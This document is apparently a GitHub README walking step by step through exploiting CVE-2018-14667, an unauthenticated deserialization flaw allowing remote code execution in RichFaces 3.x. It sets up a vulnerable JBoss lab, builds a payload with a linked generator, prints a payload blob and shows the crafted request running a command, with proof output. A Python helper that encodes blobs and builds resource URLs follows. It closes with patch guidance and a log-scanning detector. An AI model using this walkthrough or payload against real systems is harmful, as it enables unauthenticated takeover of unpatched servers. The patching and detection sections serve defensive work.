CVE-2018-14667

After spending a lot of time understanding and correctly exploiting this CVE, I decided to build a repo on the RichFaces 3.X RCE bug and share the HOWTO step by step with the community.

0x00 : Introduction to the RichFaces 3.X bug

On Monday, November 19, 2018, Joao F M Figueiredo published a well detailed article (https://seclists.org/fulldisclosure/2018/Nov/47) on a critical high-risk RichFaces vulnerability.
CVSS3 Base Score: 9.8

This vulnerability allows any unauthenticated user to perform remote code execution on any web application using RichFaces 3.X (every 3.x release, up to and including 3.3.4.Final, the last one), which is pretty much the worst case scenario. The root cause is that the org.ajax4jsf.resource.UserResource resource handler takes the /DATA/ segment of the resource URL, inflates it and feeds it to Java deserialization; the restored object graph can carry an EL method expression that the framework then evaluates on the server, hence code execution without any session or credentials.

0x01 : Am I affected?

Well, if you are running RichFaces 3.X (any version of RichFaces 3), chances are that yes, you are vulnerable to remote code execution via CVE-2018-14667. Two quick checks on a deployed application: a richfaces-impl-3.*.jar (together with the ajax4jsf classes) in WEB-INF/lib, and resource URLs of the form /a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/.../DATA/... in the HTML the application serves (see 0x04). The payload built below chains the following classes, so the target's classpath must resolve all of them for the exploit to fire:

  • org.ajax4jsf.resource.InternetResource
  • org.ajax4jsf.resource.SerializableResource
  • javax.el.Expression
  • javax.faces.el.MethodBinding
  • javax.faces.component.StateHolderSaver
  • java.awt.Color

0x02 : Running a vulnerable environment to test the bug

I will basically re-explain what has already been covered in the seclists.org article on how to deploy a vulnerable environment.

  1. Download JBoss 5.1.0.GA and the RichFaces 3.3.4.Final examples bundle, which contains the PhotoAlbum demo application.
    http://downloads.jboss.org/richfaces/releases/3.3.X/3.3.4.Final/richfaces-examples-3.3.4.Final.zip
    https://sourceforge.net/projects/jboss/files/JBoss/JBoss-5.1.0.GA/
  2. Unzip both archives.
  3. Copy the application richfaces-examples-3.3.4.Final/photoalbum/dist/photoalbum-ear-3.3.4.Final.ear to the JBoss deploy directory jboss-5.1.0.GA/server/default/deploy/
  4. Start the JBoss application server (make sure port 8080 is not already in use before launching): cd bin ; ./run.sh -b 0.0.0.0
    -b 0.0.0.0 binds JBoss to every interface, so do this only on an isolated lab network: once deployed, anyone who can reach port 8080 can take the box with the steps below.
  5. Browse to the PhotoAlbum index page (http://<lab-host>:8080/photoalbum) once so the web application initializes and renders the resource URLs we need in 0x04.

0x03 : Generating a valid payload 

Now the fun part! This is where I ran into difficulties, so I will explain in detail how to generate a valid payload without repeating the errors I made. I suggest using Eclipse to compile the payload generator.

  1. Download Eclipse from the following link:
    https://www.eclipse.org/downloads/
  2. Launch Eclipse and create a new Web Project.
  3. Get the payload generator (credit goes to orich1, https://xz.aliyun.com/t/3264), available in this repo:
    https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/Main.java
  4. Extract the WAR archive in this repo (richfaces-demo-3.3.0.GA-tomcat6.war) and copy all .jar files from its WEB-INF/lib/ folder to WebContent/WEB-INF/lib/ in your Java Web Project in Eclipse
    https://github.com/syriusbughunt/CVE-2018-14667/blob/master/richfaces-demo-3.3.0.GA-tomcat6.war
  5. Add Main.java to the project: right-click the project name in Eclipse, New, File.
  6. Make WebContent/WEB-INF/lib the build path source: right-click the lib folder, Build Path, Use as Source Folder.
  7. Let's see if you get lucky; click the green Run button to compile and run the generator. If you get 0 errors and a valid payload in your output, congratulations, you now have a valid payload for CVE-2018-14667. If instead you get all kinds of errors, don't panic. You might want to comment out the following lines, 29 to 35, so they look like this:
        // Class clazz = Class.forName("javax.el.MethodExpression");
        // Field field = clazz.getField("serialVersionUID");
        // field.setAccessible(true);
        // Field modifiersField = Field.class.getDeclaredField("modifiers");
        // modifiersField.setAccessible(true);
        // modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
        // field.setLong(null, MethodExpressionSerialVersionUID);

    What those seven lines do: they use reflection to strip the final modifier from javax.el.MethodExpression.serialVersionUID and overwrite it with the MethodExpressionSerialVersionUID value defined in Main.java, so the class descriptor written into the payload matches the EL API jar on the target rather than the one on your build path. The Field.class.getDeclaredField("modifiers") trick fails on Java 12 and later (NoSuchFieldException), which is the usual reason the generator blows up; building with a Java 8 JDK is the cleaner fix. If you do comment the lines out, the payload carries whatever serialVersionUID your local javax.el jar declares; should that differ from the target's, deserialization aborts with java.io.InvalidClassException (serialVersionUID mismatch) and your command never runs, so make sure the EL API jar in WebContent/WEB-INF/lib is the version the target ships.

Your output in Eclipse should look like the following (your blob will differ; note the eAH prefix, a zlib header showing that the serialized object is deflated before being encoded, and the .jsf suffix at the end):

/DATA/eAHNVU1rE0EYnkarbf2qtqhVhLiKTUVmW6mHWgOFKiqkFpq2fvQgk82bZOJ-dWY2WSwVRUSwIkjxpiJ4bS!6B!ToJ9Jf4EEREUEE8SbOzKaJDeqhp-xpZvfZ533med59d-ErauYMHfRYHpMiCfuLPIcZcC9gFuAJDmysstk!wehxIghSV8eRLzG0NoU2WQyIgGHPFeAKgbaliqRETJu4eXM0UwRLDKbQegh9Kjmn0RXUlEItjpelOQrZyr65ROwA9Cb0pZYDiiLEOWIBx5bn-J4ruXFayEKnPDsLLE1KwM6!fJqcv!9mJIZiKdRq2YTzM8SBlRrSglE3LzW0cflOVnMItD1SST0zDYwSm14mGRsGQ1-V75YlMQ9cLcAGwTHYeJzkR0AUvOyJ0Jcn4dRztQ8INW1EKGSoKxItofW4J-bLuQ8!--!ENK6jiqsxPb5xK!39wtIxhVAKBlQYjFqFyIKAYuL7NrWIkGUjH-qLnGUSAgwn7l07ujD2UXvSmSEcohBqtQTapQ8fmmCbk8r42jNp0zqfMB3k7hqqvtZgqLJqkULjSmgx43HtUR3bace3BxZn287Ni-7Io53Vs9dBy21Xp94!-3VXGaC4W8uP0PV9MwymA-AC50EMq3gTPdVlyiOyD-QNWy6ih4Zix6rz8FjgCuqAofGR!IQhWWr3qVvyLkHCDWy7B0MIVsIQXmAV4qZwfJOoy-iZ!U-qvh9KA!auMKDeKOVA5tuOHxuebx1RDmjbyjcb42goYKhjSqccmVb5VBaXJj993jNzUjej7PGYQJ3aWerh0UD4gZBAII5A7TXDoy6TnpSX0Duz2rqmA1lKordMCIn0A7hZ9CGf1mscFoRjx4d6D!XGh!r6Dvf1J40VAyXZAE1ghHpwrdGj6R-zoa6f!xwNKvR2zbCl!ADNNcCB4hCNY7RZBxgIamM52EHF9xa9Xl18BTleL-YCN2lU2BsrOpVCVyWFh-h2I6Sw!Bf8Wwyv0IvVxVAMuEgay9SNkYFALao7xuUo!w0w9PXD.jsf
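To see what the generator actually produced, and what the server is going to do with it, here is a small inspection tool. It is an example added to this write-up, not code from the repo or from orich1's Main.java. It assumes the blob is a Java serialization stream that was zlib-deflated and then encoded with ajax4jsf's URL64 alphabet ('-', '!' and '_' standing in for '+', '/' and '='); verify that against your target if decoding fails. The stream it decodes is constructed inline and only mimics the shape of the 0x01 chain, it is not an exploit.

```python
"""Decode, inspect and re-encode the /DATA/ segment of a RichFaces 3.x UserResource URL.

Added example; this is not code from the CVE-2018-14667 repository or from orich1's
Main.java. Assumptions (labelled): the segment is a Java serialization stream that the
resource builder deflated with zlib and encoded with ajax4jsf's URL64 alphabet
('-' for '+', '!' for '/', '_' as padding); SAMPLE_STREAM below is constructed by hand
and is only the *shape* of a gadget chain, not a working exploit stream.
"""
from __future__ import annotations

import base64
import re
import zlib

# URL64 <-> standard base64 (alphabet assumed from ajax4jsf's URL64Codec; verify on your target).
_TO_STD = str.maketrans("-!_", "+/=")
_TO_URL64 = str.maketrans("+/=", "-!_")

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"  # ObjectOutputStream header (STREAM_MAGIC, version 5)
_IDENT = re.compile(rb"[A-Za-z_$][A-Za-z0-9_$.]*")


def decode_data_blob(blob: str) -> bytes:
    """URL64 -> base64 -> inflate; returns the raw serialized object stream.

    A servlet-mapping suffix such as the '.jsf' printed by the generator is dropped
    first (no '.' can occur inside the blob itself).
    """
    blob = re.sub(r"\.[A-Za-z]+$", "", blob)
    raw = zlib.decompress(base64.b64decode(blob.translate(_TO_STD)))
    if not raw.startswith(JAVA_STREAM_MAGIC):
        raise ValueError("inflated data is not a Java serialization stream")
    return raw


def encode_data_blob(stream: bytes) -> str:
    """Inverse of decode_data_blob. Level 1 is Deflater.BEST_SPEED, which yields the
    0x78 0x01 zlib header that shows up as the 'eAH' prefix on the blobs in this README."""
    return base64.b64encode(zlib.compress(stream, 1)).decode("ascii").translate(_TO_URL64)


def classes_in_stream(stream: bytes) -> list[str]:
    """Heuristic: find TC_CLASSDESC (0x72) followed by a 2-byte length and a class name.

    Good enough to see which classes a blob references without a full parser; the
    identifier check and the length bound reject stray 0x72 ('r') bytes inside strings.
    """
    found: list[str] = []
    pos = stream.find(b"\x72")
    while pos != -1:
        n = int.from_bytes(stream[pos + 1:pos + 3], "big")
        name = stream[pos + 3:pos + 3 + n]
        if 1 < n < 256 and len(name) == n and _IDENT.fullmatch(name):
            dotted = name.decode("ascii")
            if dotted not in found:
                found.append(dotted)
        pos = stream.find(b"\x72", pos + 1)
    return found


def build_resource_url(base: str, version_tag: str, blob: str) -> str:
    """URL shape taken from the photoalbum page source:
    /a4j/s/<tag>org.ajax4jsf.resource.UserResource/n/n/DATA/<blob>"""
    return f"{base.rstrip('/')}/a4j/s/{version_tag}org.ajax4jsf.resource.UserResource/n/n/DATA/{blob}"


def _classdesc(name: str) -> bytes:
    """TC_CLASSDESC + 2-byte length + class name; enough of the grammar for the scanner."""
    encoded = name.encode("ascii")
    return b"\x72" + len(encoded).to_bytes(2, "big") + encoded


# Constructed sample: the class names of the chain from section 0x01, with zero bytes
# standing in for the serialVersionUID/flags/fields that a real stream carries.
SAMPLE_STREAM = (
    JAVA_STREAM_MAGIC + b"\x73"  # TC_OBJECT
    + _classdesc("javax.faces.component.StateHolderSaver") + b"\x00" * 8
    + _classdesc("javax.faces.el.MethodBinding") + b"\x00" * 8
    + _classdesc("java.awt.Color") + b"\x00" * 8
)

if __name__ == "__main__":
    blob = encode_data_blob(SAMPLE_STREAM)
    print("blob   :", blob)
    print("classes:", classes_in_stream(decode_data_blob(blob + ".jsf")))
    print("url    :", build_resource_url("http://192.168.100.2:8080/photoalbum", "3_3_3.Final", blob))
```

Feed the blob copied from the page source, or the generator output with its .jsf suffix, to decode_data_blob and classes_in_stream: the legitimate key looks nothing like the 0x01 chain, whereas a payload lights up with the javax.el / javax.faces.el / StateHolderSaver / Color classes, which is also a quick way to confirm you built what you think you built before firing it. build_resource_url only reproduces the URL shape from the page source so the request can be scripted instead of pasted into a browser.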

0x04 : Sending your payload and get Remote Code Execution 

Navigate in your browser to the PhotoAlbum application on your lab JBoss server (here http://192.168.100.2:8080/photoalbum) and right-click to view the page source. Hit Ctrl+F and search for '/DATA/'. You should find something similar to this:

src="/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/eAF1Uk1rFEEQrQwGEz9AXVFyCMQoCiI9JCZeYkBQ0cCsQccI6ql2pna2h57ptrtndzDozYuCF6!evOpFf4HXgJf8BkFEBBHEq929QUnAvlXx6r1Xr!rtd5g0Gs5LXTAssV0qTZ9pMrLRGbENQ!rOTnFmQ!NraBH86yx!i2BfAoczTWjpqqwt1dbCsaTEIcYC6yJe75WU2ZUE9lOruON8BE9hIoGpSua8zynfqSeHKBoKRaucl7OeomV9zMiwTFZK1o6bpdYJ3ZQiJ53ikPT9rQ-rr15!6kYQJTCdCTTmFla020NqNa8L5-GAcTN54LBwYuySyzglzVHwx9gTtNIqL3!OSTLT1MGAIGsYCXYXiy7Zgcyvt8ptYrisQw4AE4cAWg0zY9MOuhf3Pt568fn30sso4Dp!cf-Y3jx7nv58sH3ZI7yDU!4YZU-aIL2Xb61Sovfj5K-DH492vbYPbmo0CzOnN3mFBSUSXURMIa!tmm88AWg0dB6GpZk!jcsyxPJu-96Xr7ObN4Kw2yeycNz7Y1yy9caqxjogYWXhSGiH2fFZlWpHKdyOeZ2JJicTB-3YCO6KgRyxdmArMXfl4sKFhcVLc7u-yer8f63OuxuoP9Xj4!8_" style="opacity: 0.1" class="main-image"><span class="rich-tool-tip tooltip" 

You can clearly see the serialized object: everything after /DATA/ is the deflated, URL-safe-Base64-encoded Java object stream that the server inflates and deserializes on every request for that resource. This is where we replace the legitimate serialized object with our payload to get remote code execution. In your browser, change the URL to http://192.168.100.2:8080/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/YOUR-PAYLOAD-GENERATED-IN-ECLIPSE, keeping the version tag exactly as it appears in the page source (3_3_3.Final here). My payload was executing the command 'touch /tmp/PoorRichFaces', so the proof is an ls -la of /tmp on the JBoss host:

drwxrwxrwt 12 root   root    32768 Nov 30 01:45 .
drwxr-xr-x 25 root   root     4096 Nov 25 12:57 ..
-rw-rw-r--  1 syrius syrius      0 Nov 30 1:27 PoorRichFaces 

Feels good, doesn't it? We just got RCE on a Java web application running RichFaces 3.X. Note that the command runs as the account JBoss runs under (syrius here, judging by the file owner), so that is your starting privilege on a real engagement.

0x05 : How to patch ?

You might not like this fact so be ready and hang on to your keyboard: RichFaces has reached end of life and there is no upstream fix for the 3.X line, so users (you) have to apply their own patch. In practice that means one of the following:

  • Stop deserializing attacker-controlled data. The resource builder inflates the /DATA/ segment and hands it to ObjectInputStream.readObject; wrap that ObjectInputStream with a serialization filter (JEP 290, available from Java 8u121 and Java 9) or a resolveClass override that only allows the resource key class RichFaces itself writes and rejects everything else, gadget chains included.
  • If the application does not use UserResource at all, block requests matching /a4j/s/*org.ajax4jsf.resource.UserResource/* at the reverse proxy or WAF, and alert on them: a hit is an exploitation attempt, not noise.
  • Migrate off RichFaces 3 altogether; the 3.X line gets no security fixes.

Don't panic, if you can't find a way to patch, don't hesitate to contact me, we can make an arrangement so I could patch your Java Web Applications.

E-mail: [email protected]
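Until the patch is in, you want to know whether anyone is already hitting the endpoint. The detector below is an added example, not code from the repository: it runs over access-log lines, picks out UserResource requests, inflates the /DATA/ blob the way the server would, and flags blobs that cannot be inflated, are not Java object streams, or reference the gadget classes listed in 0x01. Assumptions, labelled in the code: combined-format log lines (the embedded ones are constructed, not captured traffic), the URL64 alphabet of ajax4jsf, and the MAX_BENIGN_STREAM bound, which you should tune against your own baseline.

```python
"""Flag CVE-2018-14667 exploitation attempts against RichFaces 3.x in web access logs.

Added example; not code from the CVE-2018-14667 repository. Assumptions (labelled):
combined-format log lines (the ones below are constructed, not captured traffic);
the URL64 alphabet of ajax4jsf ('-', '!', '_' for '+', '/', '='); the gadget class
names are the ones listed in section 0x01 of this README. Check the marker list and
the size bound against a clean baseline of your application's own blobs first.
"""
from __future__ import annotations

import base64
import re
import zlib

_TO_STD = str.maketrans("-!_", "+/=")
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
MAX_BENIGN_STREAM = 4096  # assumed upper bound for a legitimate resource key; tune it

# Request line of a UserResource fetch; the blob is the segment after /DATA/,
# an optional servlet-mapping suffix such as .jsf is ignored.
USERRESOURCE_REQ = re.compile(
    r'"(?:GET|POST|HEAD) \S*/a4j/s/[^/\s"]*org\.ajax4jsf\.resource\.UserResource/'
    r'[^"\s]*?/DATA/(?P<blob>[A-Za-z0-9!_\-]+)(?:\.[A-Za-z]+)?[^"]*"'
)

GADGET_MARKERS = [
    b"javax.el.Expression",
    b"javax.el.MethodExpression",
    b"javax.faces.el.MethodBinding",
    b"javax.faces.component.StateHolderSaver",
    b"java.awt.Color",
]


def inflate_blob(blob: str) -> bytes | None:
    """URL64 -> base64 -> inflate; None if the server could not have inflated it either."""
    try:
        return zlib.decompress(base64.b64decode(blob.translate(_TO_STD)))
    except (ValueError, zlib.error):
        return None


def classify(line: str) -> tuple[str, str] | None:
    """(client_ip, verdict) for a UserResource request line, None for any other request."""
    m = USERRESOURCE_REQ.search(line)
    if not m:
        return None
    ip = line.split(" ", 1)[0]
    raw = inflate_blob(m.group("blob"))
    if raw is None:
        return ip, "undecodable DATA blob (corrupt or tampered)"
    if not raw.startswith(JAVA_STREAM_MAGIC):
        return ip, "DATA blob is not a Java object stream"
    hits = [n.decode() for n in GADGET_MARKERS if n in raw]
    if hits:
        return ip, "gadget chain classes in DATA blob: " + ", ".join(hits)
    if len(raw) > MAX_BENIGN_STREAM:
        return ip, f"oversized object stream ({len(raw)} bytes)"
    return ip, "benign-looking UserResource request"


def scan_log(lines) -> list[tuple[str, str]]:
    """Classify every line of an iterable of log lines, dropping non-UserResource requests."""
    return [r for r in map(classify, lines) if r is not None]


# ---- constructed sample log (not real traffic) -------------------------------------
_RES = "/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/"


def _blob(stream: bytes) -> str:
    """Encode a constructed stream the way the resource builder would (deflate + URL64)."""
    return base64.b64encode(zlib.compress(stream, 1)).decode().translate(str.maketrans("+/=", "-!_"))


def _line(ip: str, path: str, status: int = 200) -> str:
    return f'{ip} - - [30/Nov/2018:01:27:00 +0000] "GET {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


SAMPLE_LOG = [
    _line("192.168.100.9", "/photoalbum/index.seam"),
    _line("192.168.100.9", _RES + _blob(JAVA_STREAM_MAGIC + b"constructed benign resource key")),
    _line("10.0.0.23", _RES + _blob(JAVA_STREAM_MAGIC + b"\x73\x72\x00\x19javax.el.MethodExpression"
                                    b"\x73\x72\x00\x0ejava.awt.Color") + ".jsf", 500),
    _line("10.0.0.23", _RES + "AAAA"),  # not inflatable: someone poking at the endpoint
]

if __name__ == "__main__":
    for ip, verdict in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {verdict}")
```

Run it over the real log with scan_log(open(path)), and before paging anyone confirm on a clean baseline that the blobs your application legitimately emits classify as benign; if one of the markers shows up in normal traffic, drop that marker rather than the rule.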

Contributors: 0xbad53c, syriusbughunt